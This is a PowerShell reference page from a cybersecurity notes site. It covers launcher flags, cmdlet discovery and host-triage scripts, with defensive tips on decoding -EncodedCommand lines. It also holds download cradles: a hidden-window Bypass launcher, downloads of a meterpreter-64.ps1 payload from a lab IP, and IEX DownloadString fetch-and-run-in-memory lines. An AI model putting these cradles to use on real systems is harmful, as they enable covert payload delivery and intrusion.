Th4ntis CyberSec
Powershell

Last updated 1 year ago

In short, "PowerShell is a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS." Microsoft publishes comprehensive documentation on its website, and its free "Introduction to PowerShell" course on the same site is a brief way to get started.

We can run PowerShell from the Start Menu by searching for it, from the command prompt by running powershell.exe (pwsh.exe for PowerShell 7), or from the Run dialog (Windows key + R) by entering powershell.exe.

Commands

  • IEX OR Invoke-Expression

    • The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged. iex is the built-in alias, so IEX (...) and Invoke-Expression (...) are equivalent; it is the usual way to run script text that was fetched into memory rather than saved to disk.

Arguments

powershell.exe accepts shortened parameter names as long as they are unambiguous, which is why the short forms below work.

  • -NoP OR -NoProfile

    • Starts PowerShell without loading any Windows PowerShell profile script, so the script runs in the default environment rather than one customised (or tampered with) by the user's profile.

    • powershell.exe -NoP

  • -NonI OR -NonInteractive

    • Does not present an interactive prompt to the user. Anything that would block waiting for input (Read-Host, a confirmation prompt) fails with an error instead of hanging.

  • -W Hidden OR -WindowStyle Hidden

    • Sets the window style to Normal, Minimized, Maximized or Hidden. Hidden keeps the console window from appearing to the logged-on user.

  • -Exec Bypass OR -ExecutionPolicy Bypass

    • Sets the execution policy for the current session only and saves it in the $env:PSExecutionPolicyPreference environment variable. This parameter does not change the Windows PowerShell execution policy that is set in the registry. The execution policy is a safety feature against running scripts by accident, not a security boundary, which is why a per-session Bypass is permitted at all.

  • -Enc OR -EncodedCommand

    • Accepts a Base64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces. The Base64 must be of the UTF-16LE ("Unicode") bytes of the command, not UTF-8, or the launched shell sees garbage. An encoded command is also the first thing to decode when triaging a suspicious process command line.
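
An added example, not from the original page, showing how the flags above fit together: it encodes a command for -EncodedCommand (UTF-16LE, then Base64), builds the launcher line, and decodes it again the way an analyst would when such a command line turns up in process-creation logs. The Get-Process pipeline inside is only a harmless placeholder command.

```powershell
# Added example: build and decode an -EncodedCommand payload.
# -EncodedCommand expects Base64 of the UTF-16LE ("Unicode") bytes of the
# script, not UTF-8; encoding it any other way breaks the launched shell.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    # Decode what shows up after -enc in a 4688 / Sysmon event 1 command line.
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# A harmless placeholder command with the quoting and braces that -Enc is
# meant to sidestep.
$cmd = 'Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name, Id'
$enc = ConvertTo-EncodedCommand -Command $cmd

# What a launcher built from the flags above looks like: no profile,
# non-interactive, hidden window, Bypass policy for this session only.
$launch = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc $enc"
Write-Output $launch

# Round trip: what a defender does when triaging that command line.
ConvertFrom-EncodedCommand -Base64 $enc

# Run it for real, without -W Hidden so the output is visible in this console.
& powershell.exe -NoP -NonI -Exec Bypass -Enc $enc
```

The same decode works on the Base64 blob in a Sysmon or 4688 CommandLine field; if the result looks like Chinese characters, the encoder used UTF-8 instead of UTF-16LE and the launcher would not have worked either.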

Cmdlet

A cmdlet is a lightweight command that is used in the PowerShell environment. The PowerShell runtime invokes these cmdlets within the context of automation scripts that are provided at the command line. Cmdlets perform an action and typically return a Microsoft .NET object to the next command in the pipeline. A cmdlet is a single command that participates in the pipeline semantics of PowerShell. This includes binary (C#) cmdlets, advanced script functions, CDXML, and Workflows.

A cmdlet is simply a command through which you can perform an action. The two most helpful cmdlets that everyone should be aware of are:

  • Get-Command

  • Get-Help

Using the cmdlet 'Get-Command', you can find cmdlets even when you do not know the exact name. For example, you want to restart a service from PowerShell but do not know the cmdlet; you can assume that its name contains the word 'Service', so searching with a wildcard pattern for that word lists the candidates.

Common verbs:

  • Get

  • Start

  • Stop

  • Read

  • Write

  • New

  • Out
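
As an added example (not from the original page), here is how Get-Command, Get-Help and Get-Verb are used together to find the cmdlet for restarting a service without knowing its name. The Spooler service is assumed to exist on the host, as it does on most Windows installs.

```powershell
# Added example: discovering a cmdlet and reading its help.
# Assumes the Spooler service exists (it does on most Windows installs).

# 1. Only the noun is known: list every cmdlet whose noun is Service.
Get-Command -Noun Service

# 2. Narrow by verb, or use wildcards on the full name.
Get-Command -Verb Restart -Noun Service
Get-Command -Name Restart-*

# 3. Read the help: syntax and parameters, then just the examples section.
Get-Help -Name Restart-Service
Get-Help -Name Restart-Service -Examples

# 4. Details of one parameter, including whether it accepts pipeline input.
#    Worth checking before building a pipeline around a cmdlet.
Get-Help -Name Restart-Service -Parameter Name

# 5. Approved verbs are enumerated locally; no need to look them up online.
Get-Verb | Where-Object { $_.Group -eq 'Lifecycle' } | Select-Object -Property Verb, Group

# 6. Pipe to Get-Member to see the object type a cmdlet returns and which
#    properties and methods the next cmdlet in the pipeline can use.
Get-Service -Name Spooler | Get-Member -MemberType Property, Method

# 7. Put it together. -WhatIf shows what would happen without doing it;
#    remove it to actually restart the service.
Restart-Service -Name Spooler -WhatIf
Get-Service -Name Spooler | Select-Object -Property Name, Status, StartType
```

On a fresh Windows PowerShell 5.1 install Get-Help only has stub help until you run Update-Help once from an elevated prompt; PowerShell 7 ships the same way.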

Common commands

  • Get-Help shows information about a cmdlet: Get-Help Command-Name

  • Get-Command - Gets all the cmdlets installed on the current computer. This cmdlet allows for pattern matching such as Get-Command Verb-* or Get-Command *-Noun

  • The Pipe ( | ) - Used to pass the output objects of one cmdlet to another. Eg. Verb-Noun | Get-Member

  • Invoke-WebRequest - Downloads a file to disk: Invoke-WebRequest -URI http://(IP):(PORT)/(FILE) -OutFile (FILE)

    • Invoke-WebRequest "URL/File" -OutFile "File"

      • Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -OutFile "meterpreter.ps1"

  • (New-Object System.Net.WebClient).DownloadFile('URL/File', 'Output-File') - The .NET WebClient alternative. Note the dot before DownloadFile; it is a method call. A relative output path is resolved against the process working directory, which is not always PowerShell's current location, so prefer a full path.

    • (New-Object System.Net.WebClient).DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'C:\Users\Public\meterpreter.ps1')

  • Get-Hotfix - Enumerate already installed patches

    • Get-Hotfix | Format-List | findstr InstalledOn

    • Get-Hotfix | Format-Table HotFixID

  • Format-List - Shows every property of each object, one per line, which is useful when the default table view hides information

    • dir | Format-List

  • Out-File - Used to save the output to a file for further use

    • Get-Hotfix | Out-File Hotfixes.txt

  • Start-Process - Used to start a process, such as notepad.

  • Get-Process - Lists all running processes. Can also be used with the -Name parameter to filter for a specific process

  • (command) | Export-Csv (FILE).csv - Exports the objects from the previously piped command into a .CSV file that may be easier to read or to load into another tool.

  • Get-Content - Shows the contents of a file. Similar to the cat command on Linux.

  • Copy-Item - Copies an item

  • Move-Item - Moves an item

  • Get-FileHash - Obtains the hash (SHA-256 by default) of the specified file
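
An added example, not part of the original page, that strings the cmdlets above into a small host-triage script: patches and processes go to CSV, a top-CPU listing goes to a text file, and every output file is hashed so a reviewer can tell the evidence was not altered later. The C:\Triage output directory is an assumption.

```powershell
# Added example: host triage with the cmdlets from this section.
# C:\Triage is an assumed output directory.

$out = 'C:\Triage'
New-Item -ItemType Directory -Path $out -Force | Out-Null

# Installed patches, newest first, to CSV. -NoTypeInformation stops Windows
# PowerShell 5.1 from prepending a "#TYPE ..." line that confuses other tools.
Get-HotFix |
    Sort-Object -Property InstalledOn -Descending |
    Select-Object -Property HotFixID, Description, InstalledOn |
    Export-Csv -Path (Join-Path $out 'hotfixes.csv') -NoTypeInformation

# Running processes with binary path and SHA-256, so an odd process name can
# be checked against a known-good hash. Processes whose image cannot be read
# (protected or system processes) get an empty hash instead of aborting the run.
Get-Process |
    Where-Object { $_.Path } |
    Select-Object -Property Name, Id, Path,
        @{ Name = 'SHA256'; Expression = {
            (Get-FileHash -Path $_.Path -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash } } |
    Export-Csv -Path (Join-Path $out 'processes.csv') -NoTypeInformation

# Quick human-readable view of the busiest processes.
Get-Process |
    Sort-Object -Property CPU -Descending |
    Select-Object -First 15 -Property Name, Id, CPU, Path |
    Format-Table -AutoSize |
    Out-File -FilePath (Join-Path $out 'top-cpu.txt') -Width 200

# Hash every result file. Collect first, then write, so the manifest does not
# end up listing an empty version of itself.
$manifest = Get-ChildItem -Path $out -File |
    Get-FileHash -Algorithm SHA256 |
    Select-Object -Property Hash, Path
$manifest | Out-File -FilePath (Join-Path $out 'manifest.txt')
```

Export-Csv keeps the objects' properties as columns, so the CSVs can be diffed against a baseline host or loaded into a spreadsheet; Out-File stores whatever the formatter printed, which is fine for reading but not for further processing.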

Download files

  • Invoke-WebRequest http://(IP):(PORT)/(FILE) -OutFile (Outputfile) - writes the file to disk

    • Invoke-WebRequest -URI http://192.168.1.52:8000/test.txt -OutFile Downloaded.txt

  • IEX (New-Object Net.WebClient).DownloadString('URL') - fetches the script text into memory and runs it with Invoke-Expression; no file is written to disk

    • IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.52:8000/test.txt')
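
An added example, not from the page, covering both download styles above together with the checks a practitioner wants around them: hash verification before anything is executed, the Mark of the Web tag on the disk download, and the in-memory variant done on raw bytes so the same hash applies to both. The URL, the test.ps1 filename and the expected hash are placeholders for a lab HTTP server (for example python3 -m http.server 8000 on the attacker box).

```powershell
# Added example: download-and-verify, disk and in-memory variants.
# $url, the filename and $expected are placeholders for a lab HTTP server.

$url      = 'http://192.168.1.52:8000/test.ps1'
$expected = '0000000000000000000000000000000000000000000000000000000000000000'  # SHA-256 computed on the server side
$dest     = Join-Path $env:TEMP 'test.ps1'

function Get-Sha256Hex {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $sha = [Security.Cryptography.SHA256]::Create()
    try { ([BitConverter]::ToString($sha.ComputeHash($Bytes))).Replace('-', '') }
    finally { $sha.Dispose() }
}

# 1. To disk. -UseBasicParsing avoids the Internet Explorer engine dependency
#    on Windows PowerShell 5.1 (it is the default, and ignored, on PowerShell 7).
Invoke-WebRequest -Uri $url -OutFile $dest -UseBasicParsing

$actual = (Get-FileHash -Path $dest -Algorithm SHA256).Hash
if ($actual -ne $expected) {
    Remove-Item -Path $dest -Force
    throw "Hash mismatch for $dest (got $actual)"
}

# Windows PowerShell 5.1's Invoke-WebRequest tags the file with the Mark of the
# Web (a Zone.Identifier alternate data stream); WebClient.DownloadFile does not.
# That tag is what makes a RemoteSigned policy refuse to run the script.
Get-Item -Path $dest -Stream Zone.Identifier -ErrorAction SilentlyContinue |
    ForEach-Object { Get-Content -Path $dest -Stream Zone.Identifier }

# 2. In memory. Download raw bytes so the hash is the one Get-FileHash would
#    report, then decode and hand the text to Invoke-Expression. Nothing touches
#    disk, but the text still passes through AMSI and, with script block logging
#    on, is recorded as event 4104 in Microsoft-Windows-PowerShell/Operational.
$bytes = (New-Object Net.WebClient).DownloadData($url)
if ((Get-Sha256Hex -Bytes $bytes) -ne $expected) {
    throw 'Hash mismatch on in-memory download; not executing'
}
$script = [Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)  # drop a UTF-8 BOM if present
Invoke-Expression $script
```

The hash check is what turns "download and run" into something you can trust on a real engagement: a transparent proxy or a compromised staging host can hand you a different file than the one you uploaded, and neither Invoke-WebRequest nor WebClient will notice.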

Additional resources

The full list of approved verbs is in Microsoft's PowerShell documentation; Get-Verb prints the same list locally.

Invoke-WebRequest - Makes a request to a web server. Sends HTTP and HTTPS requests to a web page or web service. It parses the response and returns collections of links, images, and other significant HTML elements. More info is in the Invoke-WebRequest reference on the Microsoft website.

Further reading:

  • Microsoft: Introduction to PowerShell

  • Microsoft: about_PowerShell.exe

  • TryHackMe: Hacking With Powershell

  • TryHackMe: Powershell for Pentesters